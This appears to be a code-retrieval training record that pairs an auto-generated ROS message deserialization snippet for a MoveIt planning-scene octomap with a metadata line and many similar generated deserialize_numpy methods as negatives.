_x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end] start = end end += 1 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary = bool(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end] start = end end += 8 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution,) = _get_struct_d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sb'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length) _x = self start = end end += 28 (_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay,) = _get_struct_3BidBid().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.is_diff = bool(self.goal.planning_options.planning_scene_diff.is_diff) self.goal.planning_options.plan_only = bool(self.goal.planning_options.plan_only) self.goal.planning_options.look_around = bool(self.goal.planning_options.look_around) self.goal.planning_options.replan = bool(self.goal.planning_options.replan) return self except struct.error as e: raise genpy.DeserializationError(e) #most likely buffer underfill
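The document field in this record is genpy-generated deserialization code: it walks a byte buffer with a running offset, reading 4-byte little-endian length prefixes (_struct_I) followed by UTF-8 strings, fixed-size struct unpacks for numeric fields, and numpy.frombuffer for packed float64 arrays. A minimal sketch of those two recurring primitives follows; the helper names (read_string, read_float64_array) and the sample payload are illustrative assumptions, not part of the dataset record.

    # Sketch of the two primitives the generated body repeats:
    # (1) uint32 length prefix + UTF-8 string,
    # (2) uint32 length prefix + packed little-endian float64 array.
    import struct
    import numpy

    _struct_I = struct.Struct('<I')

    def read_string(buf, end):
        # 4-byte little-endian length, then that many bytes of UTF-8 text
        (length,) = _struct_I.unpack(buf[end:end + 4])
        start = end + 4
        end = start + length
        return buf[start:end].decode('utf-8'), end

    def read_float64_array(buf, end):
        # 4-byte length (element count), then length * 8 bytes of float64 data
        (length,) = _struct_I.unpack(buf[end:end + 4])
        pattern = '<%sd' % length
        start = end + 4
        end = start + struct.calcsize(pattern)
        return numpy.frombuffer(buf[start:end], dtype=numpy.float64, count=length), end

    # Example: pack one string and one float64 array, then read them back.
    payload = _struct_I.pack(5) + b'hello' \
        + _struct_I.pack(3) + struct.pack('<3d', 1.0, 2.0, 3.0)
    text, offset = read_string(payload, 0)
    values, offset = read_float64_array(payload, offset)
    print(text, values)   # hello [1. 2. 3.]

numpy.frombuffer returns a view over the buffer rather than copying it, which is presumably why the numpy variant of the generated code uses it for variable-length arrays instead of struct.unpack.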
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n end = 0\n _x = self\n start = end\n end += 128\n (_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z,) = _get_struct_12d2f3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle,) = _get_struct_ihih3i3d2i2d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cmd = str[start:end].decode('utf-8')\n else:\n self.cmd = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cat = str[start:end].decode('utf-8')\n else:\n self.cat = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.control is None:\n self.control = vesc_msgs.msg.VescCtrl()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = 
_get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo,) = _get_struct_q6d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.Header is None:\n self.Header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.Header.frame_id = str[start:end]\n _x = self\n start = end\n end += 11\n (_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num,) = _get_struct_2hHBI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 3\n (_x.gear, _x.front_diff, _x.rear_diff,) = _struct_3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.sv is None:\n self.sv = None\n end = 0\n _x = self\n start = end\n end += 8\n (_x.rcvTOW, _x.week, _x.numSV, _x.reserved1,) = _get_struct_ih2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sv = []\n for i in range(0, length):\n val1 = ublox_msgs.msg.RxmRAW_SV()\n _x = val1\n start = end\n end += 24\n (_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli,) = _get_struct_2dfB2bB().unpack(str[start:end])\n self.sv.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.battery_voltage,) = _struct_f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.flight_mode_ll = str[start:end].decode('utf-8')\n else:\n self.flight_mode_ll = str[start:end]\n start = end\n end += 4\n 
(length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_estimation = str[start:end].decode('utf-8')\n else:\n self.state_estimation = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.position_control = str[start:end].decode('utf-8')\n else:\n self.position_control = str[start:end]\n _x = self\n start = end\n end += 10\n (_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load,) = _struct_2B2f.unpack(str[start:end])\n self.serial_interface_enabled = bool(self.serial_interface_enabled)\n self.serial_interface_active = bool(self.serial_interface_active)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.motor_status = str[start:end].decode('utf-8')\n else:\n self.motor_status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.gps_status = str[start:end].decode('utf-8')\n else:\n self.gps_status = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset,) = _struct_iBf.unpack(str[start:end])\n self.have_SSDK_parameters = bool(self.have_SSDK_parameters)\n start = end\n end += 16\n self.rc_channel = numpy.frombuffer(str[start:end], dtype=numpy.uint16, count=8)\n start = end\n end += 12\n self.control_axes = numpy.frombuffer(str[start:end], dtype=numpy.uint16, count=6)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.control_buttons = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n _x = self\n start = end\n end += 48\n (_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y,) = _struct_6d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude,) = _get_struct_2B6f2Bb().unpack(str[start:end])\n self.is_mr_update = bool(self.is_mr_update)\n self.is_lr_update = bool(self.is_lr_update)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.vehicle_id is None:\n self.vehicle_id = opil_v2.msg.Id()\n if self.action_capability is None:\n self.action_capability = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vendor = str[start:end].decode('utf-8')\n else:\n self.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 36\n (_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4,) = _get_struct_H2BiIbB4H2B3I().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 57\n (_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, _x.placY, _x.placZ,) = _get_struct_b7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise 
genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 8\n (self.i,) = _struct_d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.icon is None:\n self.icon = rocon_std_msgs.msg.Icon()\n if self.remappings is None:\n self.remappings = None\n if self.pairing is None:\n self.pairing = rocon_interaction_msgs.msg.Pairing()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.compatibility = str[start:end].decode('utf-8')\n else:\n self.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.display_name = str[start:end].decode('utf-8')\n else:\n self.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.description = str[start:end].decode('utf-8')\n else:\n self.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.resource_name = str[start:end].decode('utf-8')\n else:\n self.icon.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.format = str[start:end].decode('utf-8')\n else:\n self.icon.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.icon.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_from = str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parameters = str[start:end].decode('utf-8')\n else:\n self.parameters = str[start:end]\n start = end\n end += 4\n (self.max,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pairing.rapp = str[start:end].decode('utf-8')\n else:\n self.pairing.rapp = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n 
end += length\n if python3:\n val1.remap_from = str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.pairing.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.parameters = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.key = str[start:end].decode('utf-8')\n else:\n val1.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.pairing.parameters.append(val1)\n start = end\n end += 4\n (self.hash,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.role = str[start:end].decode('utf-8')\n else:\n self.role = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 1\n (self.result,) = _struct_B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.x is None:\n self.x = geometry_msgs.msg.PoseStamped()\n if self.x_desi is None:\n self.x_desi = geometry_msgs.msg.PoseStamped()\n if self.x_desi_filtered is None:\n self.x_desi_filtered = geometry_msgs.msg.PoseStamped()\n if self.x_err is None:\n self.x_err = geometry_msgs.msg.Twist()\n if self.xd is None:\n self.xd = geometry_msgs.msg.Twist()\n if self.xd_desi is None:\n self.xd_desi = geometry_msgs.msg.Twist()\n if self.F is None:\n self.F = geometry_msgs.msg.Wrench()\n if self.J is None:\n self.J = std_msgs.msg.Float64MultiArray()\n if self.N is None:\n self.N = std_msgs.msg.Float64MultiArray()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n 
self.x_desi.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi_filtered.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi_filtered.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 248\n (_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z,) = _get_struct_31d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_pose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_posture = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.J.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.J.layout.dim.append(val1)\n start = end\n end += 4\n (self.J.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.J.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.N.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n 
self.N.layout.dim.append(val1)\n start = end\n end += 4\n (self.N.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.N.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.name = str[start:end].decode('utf-8')\n else:\n self.model.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v43 = val1.position\n _x = _v43\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v44 = val1.orientation\n _x = _v44\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_headers = []\n for i in range(0, length):\n val1 = 